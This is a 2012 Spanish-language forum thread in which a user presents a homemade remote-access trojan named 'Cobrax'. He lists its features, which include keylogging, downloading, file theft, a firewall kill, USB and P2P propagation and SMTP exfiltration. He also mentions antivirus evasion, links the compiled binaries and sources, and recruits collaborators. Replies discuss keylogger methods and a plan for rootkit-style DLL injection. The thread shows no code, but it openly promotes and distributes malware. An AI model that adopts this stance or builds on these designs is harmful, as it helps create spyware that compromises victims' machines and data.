elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [C/C++] Troyano Cobrax - BETA
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [C/C++] Troyano Cobrax - BETA  (Leído 3,333 veces)
hacker83

Desconectado Desconectado

Mensajes: 8


Ver Perfil
[C/C++] Troyano Cobrax - BETA
« en: 1 Junio 2012, 06:56 am »

Bueno antes que nada quiero aclarar que este troyano lo desarrolle en menos de 3 dias, no le llega ni a los talones a un troyano verdadero tales como bifrost, spy net, poison, etc. pero solo me intereso la idea de tratar de desarrollar algun tipo de troyano. ya que previamente habia hecho varias funciones FUD con cosas tales como generar Autoruns indetectables a los 42 antivirus, asi como un downloader encryptado  en su llamado. como inyeccion de api shellexecute en otro proceso,etc.

El servidor lo programe en C++ y el cliente en VB. Como sabran yo de VB no se nada y de C me defiendo, podria mejorarle muchas cosas pero como que trabajar solo en el proyecto no me gusta, se me hace mejor como de a mas personas...

Al que este interesado me gustaría que avise por comentarios o por donde sea, mp, msn.

Desarrollar el entorno del cliente en C++ me tomaría mucho tiempo asi que por eso decidí hacerlo en VB al menos como para comprobar si las funciones andan.
No le puse para capturar la pantalla ni la cámara web, tengo para hacerlo y el método keylogger que utiliza es diferente al HOOK y al uso simple de la API GetAsyncKeyState. lo probe y funciona perfecto. tienes opciones tales como


*Abrir el cd
*Apagar el monitor
*Envio de mensajes
*Downloader (Falta configurar cliente)
*Envio de archivos (falta configurar cliente)
*Desarrollando el metodo de Compresión ZIP basado en el worm MyDoom
*Apagado de ordenador
*Manejo de procesos
*Eliminar archivos
*Ejecutar archivos
*Alocar el mouse
*Invertir botones el mouse
*Envio de teclas
*Desactivado de servicios
*Kill de utilidades del sistema
*Firewall de Windows.
*Bloqueo de ventanas.
*Recibir archivos
*Envio de MAIL motor SMTP GMAIL.
*Propagacion USB | ARES.

*Tiene bastante estabilidad por lo que llege a testear entre PC's de prueba.


Les dejo los compilados Junto con sus respectivos Sources.

http://www.mediafire.com/?xq3cd1efqkkbjie

Saludos!

PD: Ojala alguno quiera participar!  :P
En línea

0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: [C/C++] Troyano Cobrax - BETA
« Respuesta #1 en: 1 Junio 2012, 15:50 pm »

Bueno parece que esta bien, habra que leer algo de codigo. Una pregunta, esta hecho con la API de windows? Y bueno puede que me interese hacer algo en C(aunque mejor C++), pero no me hables de VB.

Saludos ;D
En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: [C/C++] Troyano Cobrax - BETA
« Respuesta #2 en: 1 Junio 2012, 16:41 pm »

HOLA!!!

Lamento decirte que el metodo CATCH (API GetAsyncKeyState. ) No es nada recomendable ya que consume mucho recurso verificar constantemente la pulsacion de alguna tecla... Aparte se pueden pasar teclas y combinaciones sin que vos te enteres.

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
hacker83

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: [C/C++] Troyano Cobrax - BETA
« Respuesta #3 en: 1 Junio 2012, 19:52 pm »

Si eso estaba enterado, no queria depender de la DLL para hacer el HOOK en el keyboard  :rolleyes: si a mi vb mucho no me llevo, Ja asi que aquel que quiera colaborar el servidor esta en C++! ya lo estoy cambiando, y si esta desarrollado con WINAPI.
y no va a quedar otra que desarollar el HOOK y atravez del downloader que trae incoporado descargar la libreria y ya que esta que la inyecte y sea tipo rootkit.  :laugh:
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Troyano disfrazado de la versión beta de Office 2010
Noticias
wolfbcn 0 1,159 Último mensaje 21 Mayo 2010, 13:18 pm
por wolfbcn
Firefox 4 Beta 12: Descarga disponible de la última Beta antes de la versión...
Noticias
wolfbcn 5 3,178 Último mensaje 28 Febrero 2011, 00:02 am
por Dreamaker
Troyano java OpenSource Adsocks v1.0 beta « 1 2 »
Análisis y Diseño de Malware
AngelCruel 12 9,624 Último mensaje 2 Abril 2012, 02:50 am
por AngelCruel
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines